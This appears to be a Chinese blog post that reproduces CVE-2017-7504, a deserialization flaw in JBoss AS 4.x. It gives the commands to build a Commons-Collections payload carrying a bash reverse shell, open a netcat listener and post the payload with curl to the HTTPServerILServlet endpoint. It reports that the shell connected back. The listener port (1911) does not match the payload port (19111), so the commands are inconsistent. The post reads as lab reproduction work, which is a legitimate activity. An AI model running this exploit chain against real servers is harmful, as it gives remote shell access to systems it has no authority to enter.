jboss反序列化(cve-2017-7504)

 

 

影响范围

JBoss AS 4.x及之前版本

 

 

复现

编译生成序列化数据

jboss反序列化(cve-2017-7504)

 

序列化恶意数据

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.159.128/19111 0>&1"
jboss反序列化(cve-2017-7504)

 

kali开启本地监听

nc -lvvp 1911

将@ExampleCommonsCollections1WithHashMap.ser 发送到http://192.168.159.128:8080/jbossmq-httpil/HTTPServerILServlet

 


curl http://192.168.159.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

jboss反序列化(cve-2017-7504)

成功反弹

jboss反序列化(cve-2017-7504)

 

上一篇:解决安装报错 mysqlclient-1.4.6-cp38-cp38-win32.whl is not a supported wheel on this platform.


下一篇:pip安装更新 及pygame 安装